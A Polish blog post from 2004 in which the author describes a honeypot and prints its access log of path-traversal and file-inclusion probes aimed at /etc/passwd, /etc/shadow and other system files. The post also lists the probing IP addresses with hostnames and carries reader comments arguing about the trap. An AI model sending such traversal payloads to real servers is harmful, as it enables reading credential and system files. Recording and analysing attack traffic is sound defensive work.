Script-kiddie z dostępem do netu

Po zastawieniu pułapki na lamerów okazuje się, że w sieci działają 2 grupy h0ck00r0w. Pierwsza składająca się z 12 IPków załapała się na maliny koło dwunastej. A druga 12 godzin później.

195.245.213.8 [01/Mar/2004:12:41:02 /index.php?m=../../../../../../etc/passwd 200
195.245.213.8 [01/Mar/2004:12:41:43 /index.php?m=../../../../../../etc/shadow 403
195.245.213.8 [01/Mar/2004:12:41:56 /index.php?m=../../../../../../etc/group 403
195.245.213.8 [01/Mar/2004:12:41:59 /index.php?m=../../../../../../etc/shadow 403
195.245.213.8 [01/Mar/2004:12:42:00 /index.php?m=../../../../../../etc/passwd 403
195.245.213.8 [01/Mar/2004:12:42:00 /index.php?m=../../../../../../etc/shadow 403
195.245.213.8 [01/Mar/2004:12:42:03 /index.php?m=page&pg_id=42 403
195.245.213.8 [01/Mar/2004:12:42:06 /index.php?m=page&pg_id=42 403
195.245.213.8 [01/Mar/2004:12:42:42 /index.php?m=page&pg_id=42 403
195.245.213.8 [01/Mar/2004:12:42:48 /index.php 403
195.245.213.8 [01/Mar/2004:12:47:25 /index.php?m=http://www.wp.pl 403
195.245.213.8 [01/Mar/2004:12:47:32 /index.php?m=http://www.wp.pl 403
62.233.173.118 [01/Mar/2004:12:47:32 /index.php?m=../../../../../../etc/passwd 200
62.21.63.21 [01/Mar/2004:12:47:45 /index.php?m=../../../../../../etc/passwd 200
212.182.0.179 [01/Mar/2004:12:48:00 /index.php?m=../../../../../../etc/passwd 200
193.0.74.236 [01/Mar/2004:12:48:20 /index.php?m=../../../../../../etc/passwd 200
212.182.0.179 [01/Mar/2004:12:48:26 /index.php?m=../../../../../../etc/inittab 403
212.182.0.179 [01/Mar/2004:12:48:34 /index.php?m=../../../../../../etc/issue 403
212.182.0.179 [01/Mar/2004:12:48:41 /index.php?m=../../../../../../etc/groups 403
212.182.0.179 [01/Mar/2004:12:48:48 /index.php?m=../../../../../../etc/passwd 403
62.233.173.118 [01/Mar/2004:12:49:02 /index.php?m=../../../../../../etc/group 403
212.182.0.179 [01/Mar/2004:12:49:06 /index.php?m=../../../../../../etc/passwd 403
62.233.173.118 [01/Mar/2004:12:49:06 /index.php?m=../../../../../../etc/passwd 403
193.0.74.236 [01/Mar/2004:12:49:32 /index.php?m=../../../../../../etc/motd 403
62.233.173.118 [01/Mar/2004:12:49:33 /index.php?m=../../../../../../etc/passwd 403
62.21.63.21 [01/Mar/2004:12:49:41 /index.php?m=../../../../../../etc/issue 403
62.233.173.118 [01/Mar/2004:12:49:45 /index.php?m=../../../../../../etc/passwd 403
62.21.63.21 [01/Mar/2004:12:49:49 /index.php?m=../../../../../../etc/passwd 403
212.182.0.179 [01/Mar/2004:12:49:52 /index.php?m=../../../../../../etc/passwd 403
212.182.0.179 [01/Mar/2004:12:50:35 /index.php 403
193.0.74.236 [01/Mar/2004:12:50:45 /index.php?m=../../../../../../etc/apache/httpd.conf 403
62.111.224.130 [01/Mar/2004:12:50:47 /index.php?m=../../../../../../etc/passwd 200
193.0.74.236 [01/Mar/2004:12:51:21 /index.php?m=../../../../../../var/www 403
62.111.224.130 [01/Mar/2004:12:51:35 /index.php?m=../../../../../../etc/passwd 403
195.245.213.8 [01/Mar/2004:12:56:00 /index.php?m=http://www.wp.pl 403
195.245.213.8 [01/Mar/2004:12:56:01 /index.php 403
195.245.213.8 [01/Mar/2004:12:56:02 /index.php?m=page&pg_id=42 403
62.87.189.119 [01/Mar/2004:12:59:15 /index.php?m=../../../../../../etc/passwd 200
62.87.189.119 [01/Mar/2004:12:59:41 /index.php?m=page&pg_id=16 403
62.87.189.119 [01/Mar/2004:13:00:03 /index.php?m=../../../../../../etc/issue 403
62.87.189.119 [01/Mar/2004:13:00:06 /index.php?m=../../../../../../etc/issue.net 403
62.87.189.119 [01/Mar/2004:13:00:15 /index.php?m=../../../../../../etc/passwd 403
80.54.227.52 [01/Mar/2004:13:04:05 /index.php?m=../../../../../../etc/passwd 200
62.21.63.21 [01/Mar/2004:13:05:37 /index.php?m=../../../../../../etc/passwd 403
195.245.213.8 [01/Mar/2004:13:05:38 /index.php?m=../../../../../../etc/passwd 403
195.245.213.8 [01/Mar/2004:13:05:45 /index.php?m=../../../../../../etc/passwd 403
80.54.227.52 [01/Mar/2004:13:06:23 /index.php?m=../../../../../../etc/passwd 403
80.54.227.52 [01/Mar/2004:13:06:51 /index.php?m=../../../../../../etc/inittab 403
80.55.36.26 [01/Mar/2004:13:07:33 /index.php?m=../../../../../../etc/motd 302
212.244.218.42 [01/Mar/2004:13:08:31 /index.php?m=../../../../../../etc/inittab 403
80.55.36.26 [01/Mar/2004:13:09:04 /index.php?m=../../../../../../etc/apache/httpd.conf 403
80.55.36.26 [01/Mar/2004:13:09:18 /index.php 403
80.55.36.26 [01/Mar/2004:13:09:19 /index.php 403
80.55.36.26 [01/Mar/2004:13:09:21 /index.php 403
212.244.218.2 [01/Mar/2004:13:09:23 /index.php?m=../../../../../../etc/inittab 403
217.153.60.98 [01/Mar/2004:14:46:27 /index.php?m=page&pg_id=47 403
80.50.33.97 [02/Mar/2004:00:37:09 /index.php?m=../../../../../../etc/passwd 200
217.30.149.192 [02/Mar/2004:00:37:23 /index.php?m=../../../../../../etc/passwd 200
217.30.149.192 [02/Mar/2004:00:37:34 /index.php?m=../../../../../../etc/passwd 403
80.50.33.97 [02/Mar/2004:00:37:46 /index.php? 403
194.9.223.27 [02/Mar/2004:00:38:34 /index.php?m=../../../../../../etc/passwd 200
217.30.149.192 [02/Mar/2004:00:38:49 /index.php?m=page&pg_id=16 403
213.76.55.193 [02/Mar/2004:00:39:01 /index.php?m=../../../../../../etc/passwd 200
194.9.223.27 [02/Mar/2004:00:39:24 /index.php?m=http://costam 403
194.9.223.27 [02/Mar/2004:00:39:33 /index.php?m=../../../../../../etc/passwd 403
213.199.194.22 [02/Mar/2004:00:39:53 /index.php?m=../../../../../../etc/passwd 200
213.199.194.22 [02/Mar/2004:00:40:23 /index.php?m=../../../../../../etc/fstab 403
213.199.194.22 [02/Mar/2004:00:40:34 /index.php?m=../../../../../../etc/group 403
213.199.194.22 [02/Mar/2004:00:40:36 /index.php?m=../../../../../../etc/groups 403
213.199.194.22 [02/Mar/2004:00:40:41 /index.php?m=../../../../../../etc/motd 403
213.76.55.193 [02/Mar/2004:00:41:55 /index.php?m=../../../../../../etc/motd 403
213.76.55.193 [02/Mar/2004:00:41:59 /index.php?m=../../../../../../etc/passw 403
194.9.223.27 [02/Mar/2004:00:42:02 /index.php?m=htp://www.tiamak.republika.pl/test 403
213.76.55.193 [02/Mar/2004:00:42:03 /index.php?m=../../../../../../etc/passwd 403
213.76.55.193 [02/Mar/2004:00:42:05 /index.php?m=../../../../../../etc/passwd 403
194.9.223.27 [02/Mar/2004:00:42:07 /index.php?m=page&pg_id=17 403
194.9.223.27 [02/Mar/2004:00:42:37 /index.php?m=./.././.././.././.././.././.././.././../etc/passwd 403
194.9.223.27 [02/Mar/2004:00:42:41 /index.php?m=./.././.././.././.././.././.././.././../etc/passwd 403

Pozwolę sobie podsumować:

prawdziwy h0ck00r używa nastepujących przeglądarek:

curl/7.10.3 (i686-pc-linux-gnu) libcurl/7.10.3 OpenSSL/0.9.7c zlib/1.1.4
curl/7.3 (i686-pc-linux-gnu) libcurl 7.3 (SSL 0.9.5)
Links (0.98; Linux 2.6.3-1-386 i586; 80x24)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; FunWebProducts)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 4.0; FunWebProducts)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; MyIE2; .NET CLR 1.1.4322)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23  [pl]
Mozilla/5.0 (compatible; Konqueror/3.1; Linux)
Mozilla/5.0 (Windows NT 5.1; U) Opera 7.23  [pl]
Mozilla/5.0 (Windows; U; Windows NT 5.0; pl-PL; rv:1.6) Gecko/20040206 Firefox/0.8
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031007
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.5) Gecko/20031120
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040117
Opera/7.21 (Windows 98; U)  [pl]
Opera/7.23 (Windows NT 5.1; U)  [pl]
w3m/0.3.2.2

Oczywiście Microsoft & IE rulez.

PS. niech ten drugi sobie lepiej uaktualni OpenSSL-a bo z myśliwego stanie sie zwierzyną.

goście muszą siedzieć na jakimś ircu lub mieć szybki sposób komunikowania się.

Świadczy o tym rozpiętość czasowa ich wizyt, po kilku minutach od pierwszego wejścia już na stronie była cała watacha żądnych sensacji (czyt. /etc/shadow) h0ck00r0w. Swoja droga ciekaw jestem jakie zjebki dostał gościu, który pierwszy zauważył "lukę" kiedy się zorientowali (?) w mistyfikacji.

używają raczej dial-upów lub dynamicznych IPków.

193.0.74.236	dhcp236.dwi.uw.edu.pl
194.9.223.27	gprs1.idea.pl
195.214.216.10	e-konta.pl
195.245.213.8	Telewizja Polska S.A. ul. Woronicza 17
212.182.0.179	magellan.umcs.lublin.pl
212.244.218.2	jessie.lonet.gdynia.pl
212.244.218.42	hell.org.pl
213.199.194.22	imp.mt.pl
213.76.55.193	pb193.torun.cvx.ppp.tpnet.pl
217.153.60.98	GTS Internet Partners
217.30.149.192	dial-192.bielsko.dialog.net.pl
217.97.227.138	PIRXNET-GLIWICE
62.111.224.130	host-ip130-224.crowley.pl
62.21.63.21	bacza.icpnet.pl
62.233.173.118	FUTURO-MAN
62.87.189.119	dial-631.bielsko.dialog.net.pl
80.50.33.97	ei97.neoplus.adsl.tpnet.pl
80.54.227.52	de52.neoplus.adsl.tpnet.pl
80.55.36.26	pavulon.apteka.com.pl, sir "LANcaster"

i jednego proxy

212.182.14.43 matpc-14-43.umcs.lublin.pl

Jeżeli powyższe IPki to OpenProxy to ja nic na to nie poradzę, nie chce mi się tego sprawdzać.

krótko mówiąc ekipa apcohu... nie, no myślałem panowie, że co jak co ale takiemu lamerowi jak ja nie uda się nabić Was w butelkę...

metody postępowania

używają googli w celu znalezienia odpowiedniego ciągu znaków w URLu (nie powiem czego dokładnie, nie chcę całej armii script-kiddie). Świadczy o tym nagłówek HTTP_REFERER. Zresztą zajrzyjcie na stronę tiamaka (pozdrawiam, gratuluję potomka, 403 Forbidden).

pozwolę sobie zacytować kawałek majla od tiamaka:

to jest sciema conie z tym passwd ktorym wszyscy sie podniecaja ?? ;)
normalnie mie tu ludzie wczoraj az orgazma mieli ;]
az sam musialem luknac
ale to nie wyglada normalnie :P
moim zdaniem to jest taki fake dla lamuhuf ;)

ODP: przepraszam, nie mogę odpisać, nie mogę się z podłogi podnieść ROTFL

Jak widać na załączonym obrazku wszyscy ci, którzy zechcą przetestować moje zabezpieczenia dostają 403 Forbidden i poczytne miejsce na liście banów.

Jeżeli chcesz się dowiedzieć co takiego przygotowałem dla gości specjalnych, nie wstawiaj w pasku adresu /etc/passwd pobaw się pg_id, wiedząc, że strony-pułapki robiłem dość niedawno... Chyba nie dość wyraźnie zaznaczyłem, że pg_id to liczba dodatnia a nie ciąg znaków, a ja posiadam odpowiednie validatory na wejściu.

Data utworzenia : 2004-03-02, data aktualizacji :2005-09-08

Skomentuj ten tekst



2007-10-08 04:15:33	shirty_dogg
mam tak samo jak ty.. na na na ;)
po szybkim rzucie oka na spis ipków stwierdzam, że część (co wcale mnie nie dziwi) zbioru jest wspóla... zwłaszcza te 80.50... proponuję wymianę ;) a tak poważnie mam rozmowe na gg z przedstawicielka jednej z tych grup na H i jest klasy "pamiętnik hackera" - choć nie tak śmieszna ;) jeżeli chcesz poczytać daj znać dogg
Odp.: chwilunia - te IPki sa sprzed 3 lat! jest 1:30 w nocy - wyjaśnij mi na @ co byś chciał, tylko wiesz - dużą czcionką - i bądź cierpliwy - obecnie jestem zawalony robotą.

2004-06-21 23:33:13	Nie podam bo się będziecie śmiali :)
RE na głupie RE :)
> rst+ack > honejpot > Śmieszna ta strona. Co ona ma udowadniać? Ma udowadniać to, że są jeszcze tacy idoci jak ty. > Uważasz, że jesteś lepszy, bo wystawiłeś kilka sfejkowanych plików konfiguracyjnych. > Czy to, że ktoś je sobie ściągnie coś oznacza? > Nic, zupełnie nic... Czy ty przypadkiem nie dałeś się na to złapać? Taki zapewne wielki osiedlowy haker jak ty dał się nabrać? Udało Ci się "zhakować" jakiś lamerski serwer osiedlowy ale poległeś na zwykłym Hołm Sajcie i teraz narzekasz?

2004-05-10 03:40:02	rst+ack
honejpot
Śmieszna ta strona. Co ona ma udowadniać? Jak można stwierdzić, że passwd jest nieprawdziwy bez ściągania go? Wymyśliłeś sobie, że masz honepot, a w rzeczywistości nic nie masz. Najwyżej statystykę popularności pliku passwd (i innych). No i jakaś ekipa apcoha... Nie wiem skąd ją wziąłeś. Czy z tego, że z kilku hostów postowano czasem na alt.pl.comp.os.hacking? To jest ekipa? Uważasz, że jesteś lepszy, bo wystawiłeś kilka sfejkowanych plików konfiguracyjnych. Czy to, że ktoś je sobie ściągnie coś oznacza? Nic, zupełnie nic...

engine: